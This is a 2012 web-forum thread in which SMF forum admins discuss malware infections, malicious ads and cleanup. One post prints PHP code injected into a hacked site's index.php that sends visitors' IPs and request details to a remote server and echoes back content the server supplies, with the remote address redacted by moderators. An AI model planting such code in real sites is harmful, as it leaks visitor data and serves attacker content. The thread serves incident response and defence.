If it was an SMF problem, it has not since reoccurred.  There were several publishers reporting problems on Google AdSense Help forum of malware in an ad.   I know of at least another large forum whose members were also reporting malware coming through Google ads and that forum is not using SMF.     My forum members are not particularly geeky and it took nearly two weeks before we finally started getting good screen shots of the malware alerts so we could see what they were getting.  A common denominator emerged....there was a particular originating IP address on one particular Google ad channel.    Google has been, as usual, quite tightlipped about it with no admission that the malware was coming through one of their ads. 

Although about 2 dozen people reported getting malware alerts from their AV, only about three or four actually got infected.  If a person has a good, up to date AV software, it quarantined the virus or blocked it totally.  It was a good reminder to everyone to keep their browsers, AV, AV definitions, add ons and plug-ins up to date with the latest versions and to become more "street smart" about surfing the Internet (as in "don't click on a pop-up telling you your computer is infected and directing you to click on something which does download a rogue AV to your computer"). 

Interesting... I see tons of people now are having problems with SMF getting hacked... we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily. Thanks for all the help everyone.

Quote from: Flavious on April 10, 2012, 05:07:21 PM
I see tons of people now are having problems with SMF getting hacked...

I looked around on the general support boards and only saw a few reports. Am I missing somewhere that those "tons" of people are posting?

Quote from: Flavious on April 10, 2012, 05:07:21 PM
we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily.

Given the last patch was released in December of 2011, even a monthly review should have brought up some awareness of the update. Also, are you sure that the issue you encountered was the exact thing fixed in the update? Simply not having recurring issues isn't enough to state that with any kind of authority.

Quote from: 青山 素子 on April 10, 2012, 05:33:55 PM

Quote from: Flavious on April 10, 2012, 05:07:21 PM
I see tons of people now are having problems with SMF getting hacked...

I looked around on the general support boards and only saw a few reports. Am I missing somewhere that those "tons" of people are posting?

Quote from: Flavious on April 10, 2012, 05:07:21 PM
we are sure now it came in from the old version of SMF. Everything else has been eliminated. We got the virus PRIOR to SMF releasing the patch. Lesson learned: Check those updates daily.

Given the last patch was released in December of 2011, even a monthly review should have brought up some awareness of the update. Also, are you sure that the issue you encountered was the exact thing fixed in the update? Simply not having recurring issues isn't enough to state that with any kind of authority.

No, because I couldn't get any answers as to *what* the update fixed. Is there a list somewhere that I missed? When the patch came out, all I recall it said was 'security issue" or something to that effect, and I could get no more details on it than that...

You can see all the exact code changes in the Updates site, and the changelogs on the downloads page.

Just for the head count ... my smf site was also hit by a trojan recently. Several people reporting a virus/infection on the site with different brands of firewall. Site has just been cleaned out and hopefully it wont come back. Dont know how it got in ... smf or mods perhaps? There was also an installation of menalto gallery 3 but thats all.
SMF 2.02, SPortal 2.3.5

What site was this on? Why the lack of information on the infected site? I read the whole post and the author didn't supply the information.

Quote from: igirisjin on April 12, 2012, 12:37:44 PM
Just for the head count ... my smf site was also hit by a trojan recently. Several people reporting a virus/infection on the site with different brands of firewall. Site has just been cleaned out and hopefully it wont come back. Dont know how it got in ... smf or mods perhaps?

While possible, in my experience, where the software on the site is the latest patched version with no known vulnerabilities, it's a hosting configuration issue over 90% of the time.

Quote from: igirisjin on April 12, 2012, 12:37:44 PM
There was also an installation of menalto gallery 3 but thats all.
SMF 2.02, SPortal 2.3.5

A security update for Gallery 3 and 2 has been recently released (http://gallery.menalto.com/gallery_3_0_3_and_gallery_2_3_2). The issues that it solves are minor and XSS-related things, so I don't know that such a thing would be the root issue.

If you want to try and find the root cause, start by looking at your server logs around when the reports started coming in, and work backwards looking for suspicious activities.

Another good tool to go along with that is if you have some sort of analytics, then use it. I do use it to track trends but allot of times I also use this to track malicious usage through the site and figure out what they where looking for and what they where poking at. I learned quite a bit of how a bot figures out forum type this way, which helps with developing anti-bot measures. I am sure though you can use it to figure out any malicious activity going on there. However there are quite a bit of limitations and not every bot has to load the analytics, so it may just give you nothing. ;)

Not sure about the originator of this thread but unfortunately people don't give details when they report the site has a virus or trojan - even people over on simple portal - 3 reported firewall blocking the site but no details. So I have none.
I couldn't get any warning with comodo or avg and over 10 site scanning services.


One friend/site member reported it also - will ask if he has any details.

The linked site in my signature was infected.

Quote from: nend on April 12, 2012, 01:34:55 PM
not every bot has to load the analytics, so it may just give you nothing. ;)

This is why raw server access and error logs are best. You can see the raw IPs (impossible with many of the hosted analytics packages), view the URLs, and track activity and referrers. Also, since these are generated on the server for every access, nobody can avoid being logged.

This was one possibly on my site before ...

Trojan Downloader : Win32/Karagany.I

Alert level: severe.

Update ... hacked again.


Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( '{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           @$stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle);
}
}
?>

(edit: removed base64 string to render code (semi-)unusable)

If you decode the base64 that is in the script you end up with this url.

http://{snap}.com/stat/stat.php

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.

I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.

Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

That only  works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.

update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didnt work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.

I know some so called free firefox plugins from dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^